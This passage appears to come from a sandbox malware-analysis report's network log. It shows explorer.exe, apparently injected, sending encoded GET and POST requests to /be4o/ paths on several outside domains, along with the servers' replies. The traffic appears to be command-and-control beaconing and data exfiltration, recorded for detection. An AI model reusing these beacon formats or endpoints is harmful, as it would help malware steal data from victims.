                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.107887030 CET11420OUTData Raw: 53 6b 62 63 62 57 38 59 37 5a 74 77 39 76 53 50 56 68 63 65 6e 51 57 71 43 4c 37 47 63 63 6d 58 48 62 7a 36 4d 64 45 32 79 45 76 59 4d 30 75 5a 28 49 79 51 65 6d 33 32 35 67 5a 74 56 32 4a 4c 44 49 58 39 72 44 4e 4e 6c 75 77 47 28 68 4f 77 33 41
                                                                                                                                                                                                                              Data Ascii: SkbcbW8Y7Ztw9vSPVhcenQWqCL7GccmXHbz6MdE2yEvYM0uZ(IyQem325gZtV2JLDIX9rDNNluwG(hOw3AO-DX18Q4Nod2q8LqELmYllefKe5h7cWaph7_9VkWClaYk6itXfQyohhL(7~ift1tRZ6QYfhoRTQ-pQsFlaP8Em9mgIX7MpSPrxQky8zL(lwRdk~o30PcLEpn27atzSckDuNfgxlwckZg1pT6EKeadKmGtaSY9_nqJ
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108184099 CET11423OUTData Raw: 6c 32 57 45 66 5f 6c 6f 74 37 48 77 64 68 57 78 4d 79 51 66 77 49 48 37 30 5f 58 62 34 42 79 59 61 54 77 58 57 70 71 65 44 36 7a 64 59 6a 6b 31 72 70 48 36 6f 51 48 71 55 77 68 41 6e 61 66 31 66 52 76 37 4a 6d 4f 70 43 69 67 6b 44 58 52 6d 36 6a
                                                                                                                                                                                                                              Data Ascii: l2WEf_lot7HwdhWxMyQfwIH70_Xb4ByYaTwXWpqeD6zdYjk1rpH6oQHqUwhAnaf1fRv7JmOpCigkDXRm6jKg46B_Wz449jbe09joq1fqdoO1JUHqLVeGnhAq8pO0T62C5E84Vhbbt7mjlSsbq-aNQfqn6WLiJrw2jrXgo_(Va0WOmNFQvds7FYIHNiHredZOCXt535pzlH~_TaL1IalHnS1F1wCf8jSzJ0Ds~uo8HDllllfhXFt
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108366013 CET11427OUTData Raw: 72 4a 47 37 37 6c 43 2d 6d 37 5a 43 63 6b 49 31 33 43 6e 52 49 51 74 54 39 55 75 61 4e 58 51 43 72 76 43 4d 45 35 53 36 4a 49 71 66 56 57 45 43 43 59 71 5f 31 37 52 56 32 49 64 49 4e 6b 4d 76 62 6e 34 58 48 36 52 69 79 68 41 71 4d 67 62 42 6a 49
                                                                                                                                                                                                                              Data Ascii: rJG77lC-m7ZCckI13CnRIQtT9UuaNXQCrvCME5S6JIqfVWECCYq_17RV2IdINkMvbn4XH6RiyhAqMgbBjIHToqeTbVlfmcHSjSVnD1QP2lvAn5moz8UUpxBUKF9MlBAjLtpuzu7V2FLpZ4Z-a0oo8HltUUpL80cwFidcXpq3tvRtPYBs3ZFk~o0KGH6iJAnp6Ttp83tWkJp11dNpPgQQXWLcpfCb(P1yjT6zQPoV1h31oJ2l896
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.108597040 CET11430OUTData Raw: 71 4e 71 41 73 50 51 30 57 76 7e 54 37 78 43 37 36 37 7a 38 41 37 4d 49 62 65 6e 74 76 30 51 44 38 6a 76 62 74 4f 55 72 6c 6c 48 49 4f 4e 57 78 28 7a 65 6e 67 66 55 50 30 64 53 4e 42 31 36 69 77 56 67 34 69 79 66 6a 50 75 71 61 34 50 79 65 63 30
                                                                                                                                                                                                                              Data Ascii: qNqAsPQ0Wv~T7xC767z8A7MIbentv0QD8jvbtOUrllHIONWx(zengfUP0dSNB16iwVg4iyfjPuqa4Pyec0s_~u8nNrWSZlR0NQ~GjMzp0nQtX6E8vbw7SBnEkR2SIu(hg8Em~jlgzS7VXbeE4BEYR3j3v1fObXk1AgvYCxqE2limzBj7jvfR1tgXMMZHZQePsJTd8yRkKg64Kfxgr62EqUgvIV(9N-Sxb0ZUplqpZLDO7shX7Nu
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.257427931 CET11559INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:05 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CbjudUiBjCW5Ca4At5kMqgpefCGUlUMhFy81qXT6n7567CytrZGaq0zum65/Z+hg0KTAtZmTvVBtpROPYlF2QA
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              53192.168.11.204985534.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.097593069 CET11407OUTGET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:56:05.268443108 CET11559INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:05 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61fc6928-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              54192.168.11.204985635.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.377640963 CET11563OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.ooo-club.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.ooo-club.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 66 50 6c 5a 5a 74 73 4c 61 48 35 52 6e 33 74 63 58 42 39 4b 34 62 63 37 41 74 4e 37 34 61 39 65 37 59 7e 62 31 77 4d 49 43 4b 43 61 66 71 75 56 67 58 6b 4d 6f 72 75 4e 53 31 70 43 76 65 58 4e 46 68 44 5a 50 6e 4d 38 6f 6f 78 63 6a 62 68 44 77 39 78 63 42 46 63 4b 50 32 58 74 59 6c 61 47 6f 46 58 62 56 65 64 4a 79 6a 51 49 75 54 52 64 52 49 44 32 71 4f 5a 39 72 6c 34 61 7a 74 28 62 32 76 32 58 6c 2d 6a 62 33 7a 32 7a 36 61 42 6f 6b 49 7e 51 73 6d 30 4d 51 4d 37 30 43 6b 54 61 61 31 4c 70 54 37 68 48 28 6b 41 4f 70 58 37 47 54 39 41 64 31 79 52 48 7e 61 67 67 6e 50 4c 54 48 4b 62 54 6f 51 50 6c 52 6b 62 42 66 50 61 4b 39 6c 63 71 38 78 56 37 68 36 45 34 59 68 70 63 77 5f 59 61 4b 53 36 44 6d 56 5a 35 4d 62 6c 78 43 77 50 6f 58 42 6a 6e 41 77 28 6f 38 6a 6b 6d 55 48 49 62 30 6f 37 36 79 5a 73 72 51 33 57 4e 79 59 72 44 36 38 6b 58 6a 69 42 75 50 6f 66 2d 4a 67 64 44 46 41 41 36 76 48 47 6f 50 4f 50 4e 32 4b 46 79 48 5a 55 4d 39 4b 42 46 43 47 35 57 58 4a 51 50 59 54 63 37 6b 4f 79 31 64 59 76 49 56 47 76 45 46 56 42 4a 6a 2d 4f 6f 43 6d 73 74 72 6e 57 4e 42 73 59 66 6d 4a 70 74 4b 69 61 77 43 33 42 38 45 33 58 76 45 44 6c 58 48 63 31 7a 45 6f 78 49 61 4b 4f 68 41 6e 55 49 51 59 4c 5a 69 79 39 31 59 74 32 50 4a 78 6b 52 51 32 6c 71 55 4c 51 61 6a 6f 4c 41 47 38 33 48 6e 48 73 73 75 54 72 57 56 65 48 65 43 51 30 2d 75 66 45 6b 35 39 62 42 73 31 77 6b 44 39 28 6d 6d 4f 57 5f 73 4f 44 58 61 47 49 58 39 4e 42 44 66 6f 71 48 41 78 54 4b 7a 45 4a 74 77 5f 65 35 38 6e 69 47 6b 6b 44 36 45 73 38 50 4d 67 6a 62 32 79 71 71 30 36 7a 6b 7e 74 50 63 62 62 77 62 37 66 58 57 39 58 45 78 45 4b 53 63 45 49 6b 72 28 56 62 5a 4b 48 39 61 6c 4d 7a 77 56 61 4b 63 77 4f 36 5f 62 31 31 51 7e 58 54 56 54 79 75 43 38 4a 73 48 62 6a 4b 4c 4f 4f 75 31 39 39 6f 53 35 6c 53 33 41 69 68 57 43 75 79 6f 55 66 65 45 6c 55 70 69 53 4a 48 53 4a 49 4f 4b 67 36 7a 39 71 52 4a 70 65 79 4c 63 54 73 52 65 6e 6f 4d 31 73 51 71 32 48 78 46 71 31 32 75 66 7e 43 74 43 53 4c 44 75 42 55 34 74 4a 47 54 34 30 67 52 47 65 56 37 4b 42 4d 75 6f 28 54 50 46 61 50 4d 37 43 4d 52 4a 64 56 54 57 61 79 77 71 70 55 38 79 4a 34 59 63 63 49 71 79 42 74 55 49 33 65 53 48 75 6b 7e 62 37 44 74 68 79 36 64 44 35 73 77 35 73 54 62 74 38 56 77 5a 36 31 49 68 6a 4f 6c 71 59 70 4c 6f 35 5a 77 6d 4d 68 33 63 36 73 52 74 55 63 44 35 48 55 72 50 75 5f 50 72 4d 44 46 38 32 47 42 6f 68 70 53 4c 32 41 6c 43 63 4a 37 37 35 68 46 30 31 4b 58 30 6c 6f 63 38 46 62 51 51 4b 5f 74 75 58 35 38 74 57 4e 37 52 47 4a 33 35 44 31 49 51 57 4e 5a 4e 69 43 34 59 4a 38 35 53 69 67 28 59 32 58 79 62 47 65 49 4c 57 78 56 4a 66 59 53 70 4e 75 79 79 36 6e 51 55 31 4a 42 62 73 70 37 46 50 7a 6c 77 74 4b 41 6b 50 47 66 62 70 65 6c 32 72 78 6b 61 68 6a 49 4f 68 6c 58 61 38 2d 7a 5f 64 79 31 33 65 49 44 4c 56 6e 43 6c 41 5f 76 69 32 59 30 59 28 67 63 45 58 77 71 46 6e 7a 64 57 4e 31 68 35 28 6a 59 70 6a 4d 39 57 67 75 6a 73 6e 66 74 72 28 71 62 76 66 39 30 54 63 50 7e 31 41 4c 42 65 37 45 49 36 78 35 47 34 77 37 4c 59 59 68 34 5a 6a 65 5a 52 44 78 38 35 35 51 47 51 52 57 37 76 6d 66 59 32 6a 33 4e 56 31 47 64 48 73 4c 7e 56 4d 64 35 58 59 4e 4a 63 44 33 72 75 5a 41 78 4e 78 52 79 48 72 4f 6c 37 69 79 33 44 28 6f 6f 61 78 72 52 76 30 6c 35 62 6c 37 55 69 41 32 42 4b 59 4d 4b 33 30 6a 58 46 30 53 78 48 6c 43 49 5f 75 31 6d 4a 39 42 77 36 38 5a 48 36 59 6c 6c 4a 56 70 39 38 4c 6f 4b 70 61 55 41 76 4f 66 62 4a 51 5f 64 65 4d 4a 6e 6c 6a 53 51 64 78 57 67 51 6f 58 57 64 46 71 6b 38 36 48 37 4e 73 72 4f 6d 67 54 7a 43 41 55 61 4c 38 37 57 44 61 37 33 76 5a 4c 69 6b 72 4e 41 63 4a 49 73 48 30 6e 56 47 56 67 37 4b 56 63 5a 49 4c 51 7e 77 5a 4d 66 32 79 31 48 39 71 67 4e 64 47 75 72 76 74 51 68 5f 4e 55 35 34 6b 75 70 43 43 4b 7a 35 36 65 4b 52 32 62 41 47 30 58 48 6d 79 6a 63 30 45 56 70 6d 35 75 46 6a 70 6c 57 45 6f 41 57 54 51 4a 51 36 32 64 56 69 5a 52 6c 4f 31 66 73 56 31 6e 7a 4d 71 63 47 53 45 59 65 75 43 31 55 51 4d 44 4f 62 37 6c 4b 75 62 58 73 4f 73 6e 54 4e 6d 38 31 7a 42 48 6f 59 58 67 7a 59 58 6c 66 32 59 4f 58 4d 43 66 7a 4b 71 63 61 72 77 64 39 4a 78 55 33 4a 79 52 67 56 68 74 62 4d 6b
                                                                                                                                                                                                                              Data Ascii: h48Hl=fPlZZtsLaH5Rn3tcXB9K4bc7AtN74a9e7Y~b1wMICKCafquVgXkMoruNS1pCveXNFhDZPnM8ooxcjbhDw9xcBFcKP2XtYlaGoFXbVedJyjQIuTRdRID2qOZ9rl4azt(b2v2Xl-jb3z2z6aBokI~Qsm0MQM70CkTaa1LpT7hH(kAOpX7GT9Ad1yRH~aggnPLTHKbToQPlRkbBfPaK9lcq8xV7h6E4Yhpcw_YaKS6DmVZ5MblxCwPoXBjnAw(o8jkmUHIb0o76yZsrQ3WNyYrD68kXjiBuPof-JgdDFAA6vHGoPOPN2KFyHZUM9KBFCG5WXJQPYTc7kOy1dYvIVGvEFVBJj-OoCmstrnWNBsYfmJptKiawC3B8E3XvEDlXHc1zEoxIaKOhAnUIQYLZiy91Yt2PJxkRQ2lqULQajoLAG83HnHssuTrWVeHeCQ0-ufEk59bBs1wkD9(mmOW_sODXaGIX9NBDfoqHAxTKzEJtw_e58niGkkD6Es8PMgjb2yqq06zk~tPcbbwb7fXW9XExEKScEIkr(VbZKH9alMzwVaKcwO6_b11Q~XTVTyuC8JsHbjKLOOu199oS5lS3AihWCuyoUfeElUpiSJHSJIOKg6z9qRJpeyLcTsRenoM1sQq2HxFq12uf~CtCSLDuBU4tJGT40gRGeV7KBMuo(TPFaPM7CMRJdVTWaywqpU8yJ4YccIqyBtUI3eSHuk~b7Dthy6dD5sw5sTbt8VwZ61IhjOlqYpLo5ZwmMh3c6sRtUcD5HUrPu_PrMDF82GBohpSL2AlCcJ775hF01KX0loc8FbQQK_tuX58tWN7RGJ35D1IQWNZNiC4YJ85Sig(Y2XybGeILWxVJfYSpNuyy6nQU1JBbsp7FPzlwtKAkPGfbpel2rxkahjIOhlXa8-z_dy13eIDLVnClA_vi2Y0Y(gcEXwqFnzdWN1h5(jYpjM9Wgujsnftr(qbvf90TcP~1ALBe7EI6x5G4w7LYYh4ZjeZRDx855QGQRW7vmfY2j3NV1GdHsL~VMd5XYNJcD3ruZAxNxRyHrOl7iy3D(ooaxrRv0l5bl7UiA2BKYMK30jXF0SxHlCI_u1mJ9Bw68ZH6YllJVp98LoKpaUAvOfbJQ_deMJnljSQdxWgQoXWdFqk86H7NsrOmgTzCAUaL87WDa73vZLikrNAcJIsH0nVGVg7KVcZILQ~wZMf2y1H9qgNdGurvtQh_NU54kupCCKz56eKR2bAG0XHmyjc0EVpm5uFjplWEoAWTQJQ62dViZRlO1fsV1nzMqcGSEYeuC1UQMDOb7lKubXsOsnTNm81zBHoYXgzYXlf2YOXMCfzKqcarwd9JxU3JyRgVhtbMkkEeMUk7m0iatgOLVHvj9i1TdPiD87(Bb0tRWp95HCmPenRWVDWT0Qr-cx9wyqylKLb3gwAq9Ox_ZEih7I8wCLFKfbcXwbxWNTO3wYbUQUmjjIrO0o81NL8ocy7oqNnBgTicVQCy5FWXQHL6ZN7iEEEZUVqKyB1gCBCCYZghlKKpS2~fwOs4dmOW2870oQz9kduXKK2duLa40U6oZF9ZXFTnzmSy7PPGFkyosSBxKusw2RvWdTA_x_CORurXgrGHL64xhf0w2jWi(0kcDu98hPR8M2X-cTzQzI2O7EZD~JE9CdwphKgTro~fr_DSb9Apznrfw5dsY4IlkXVGol39bJu4YC5eXkZ8IvJaFTi8jzjzxgVquU7ygl(kbKtBewNSKYjQ7s7WSJrE5Bj7eHylOfZBEJxPbWtksKSM4lU5VgiKQYu_WIUAHBEWizAzV5eMNUzBScTpzQuhn_vMWCeY5fzkauTT41S9GodcyPWz4vgEF-69j-5W1GFtgiE9fIyquaV9NpyaJP(fOnnVYLhnRfDW7nq9Ekg2eOOib4ng(YOXmXPoZjmbiec2mpH10h6bJ81BhmuStFMDoUXNdD4-nSRCzkUjUBnLPv7MrO7Uc7NOkrWKY_udVaOMsZCGDP0e37VP6ue0L9HncVYlTYSFJAD_dlEr8zS84eR-Wg37uL6NkkJoLNe1TG3659h7nhdOAMT4eEf5NTM5T1cWkuUQ7g7iy8mHOfEQbf1F5S8ahuLl094I~w8Ny1(YPvtqlTISy9dFAY9WuIh94xLUzbC0FxqXqsjf7kZgBhMp9j6lTT~yaKMBzlD0sHfugvJxUpH5CJA5(ar6OaHkBF(UY8C52E(UE385Jjx9UGq69UtEWOZ5qbk5ihWQz0JtqaVL0K1w4Lg_iU(ZVcaL2GkaglDnkYh
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.377743959 CET11574OUTData Raw: 35 53 54 42 70 4c 41 32 77 4e 4e 28 55 6a 4d 36 73 54 37 36 64 62 62 28 76 53 39 37 52 67 39 7a 47 33 68 51 5f 7a 41 70 67 71 56 62 4b 44 61 4e 34 66 34 35 45 49 71 61 4c 77 71 46 32 42 72 71 68 7e 4d 61 66 5a 4a 4d 31 6e 6f 46 6e 30 71 70 33 69
                                                                                                                                                                                                                              Data Ascii: 5STBpLA2wNN(UjM6sT76dbb(vS97Rg9zG3hQ_zApgqVbKDaN4f45EIqaLwqF2Brqh~MafZJM1noFn0qp3ileVWvTg(anHvB49WGlay_B5OOcPT-x7bYE99psjDPYY53PqsllfGW2i2QCOsB3KBFK1ohqs5-7aaYvq9CVgx041o7ujuP4NKSJJ6AaJdam3ll0ZjNooTLDVhR3_izKRbhWfkvV1e5nGxN1Ukcj9VAos2iWSmoIltN
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400630951 CET11575INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:15 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400695086 CET11577OUTData Raw: 78 7a 49 58 4d 33 51 59 53 49 56 39 75 6e 33 70 5f 34 55 57 53 32 34 68 30 68 4c 44 2d 6b 6a 6a 2d 38 67 28 30 66 2d 6d 61 64 59 43 44 74 6e 46 59 6a 6e 39 38 43 4e 4c 4e 70 6f 5a 76 4f 4c 57 79 78 67 75 66 69 59 69 6c 58 44 58 66 58 72 72 74 62
                                                                                                                                                                                                                              Data Ascii: xzIXM3QYSIV9un3p_4UWS24h0hLD-kjj-8g(0f-madYCDtnFYjn98CNLNpoZvOLWyxgufiYilXDXfXrrtbxvgVeyeS0nCMy1bnvohINyJpQAXoaMsnElMjwPlNFG-~xLPyr0mGA6t2Gvo9HYwDhE_FVjnvsbjmGt5LZGoa4zhtnpUGXi0KIdhmdqlt0AoLVpvH4~nBGaX6xxLB3q9VmitB0vacwaFB-9NGDWeXdWzjkp_9g~sY2
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.400868893 CET11583OUTData Raw: 38 75 69 6e 73 65 42 34 51 65 56 34 79 44 4c 46 6e 28 4d 68 44 79 43 41 68 61 6b 48 68 6a 30 32 42 4c 68 78 59 4f 7a 7e 52 72 6d 4a 2d 6e 66 44 6f 67 4d 73 6a 76 49 48 33 7e 70 61 44 65 52 50 4f 69 62 74 4f 49 51 30 50 62 2d 35 58 4e 50 72 46 33
                                                                                                                                                                                                                              Data Ascii: 8uinseB4QeV4yDLFn(MhDyCAhakHhj02BLhxYOz~RrmJ-nfDogMsjvIH3~paDeRPOibtOIQ0Pb-5XNPrF3Ia_k8(0Be0lnMVkWevpwcE_ayd7bMoLX4sXD0ukIDtdxU4YJv0Ei57MtnEpskAn33QRNRhSaukapIi0hUytw_XZVm63Sh~aYvcOoGJlgXArnEGF3RgQ6o6srulTdgKcQr5DDKj-6aDiEBPcNKgQ~2L9j5HOa9sLp8


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              55192.168.11.204985735.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.403493881 CET11584OUTGET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:56:15.428601980 CET11585INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:15 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              56192.168.11.204986064.32.22.10280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.806749105 CET11611OUTGET /be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g HTTP/1.1
                                                                                                                                                                                                                              Host: www.brainymortgage.info
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:56:38.964276075 CET11611INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:38 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: http://www.brainymortgage.info?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              57192.168.11.2049863217.160.0.9880C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
